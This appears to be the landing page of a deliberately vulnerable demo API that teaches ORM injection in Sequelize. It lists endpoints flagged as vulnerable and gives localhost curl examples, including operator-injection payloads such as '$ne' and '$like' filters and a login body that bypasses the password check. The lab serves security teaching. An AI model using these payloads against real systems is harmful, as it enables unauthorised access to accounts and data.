Welcome to the vulnerable API. This application demonstrates ORM Injection vulnerabilities in Sequelize.
?search[$ne]=null
/api/users
VULNERABLE
List/search users. Supports search, role, status parameters.
/api/users/:id
Get user by ID.
/api/users/search
VULNERABLE
Advanced search with JSON body. Accepts filters object.
/api/auth/login
VULNERABLE
User login. Requires username and password.
/api/auth/register
Register new user.
/api/products
VULNERABLE
List products with filters.
curl "http://localhost:3000/api/users?search[\$ne]=null"
curl "http://localhost:3000/api/users?search[\$like]=%"
curl -X POST http://localhost:3000/api/auth/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":{"$ne":""}}'
curl -X POST http://localhost:3000/api/users/search \
-H "Content-Type: application/json" \
-d '{"filters":{"role":"admin"}}'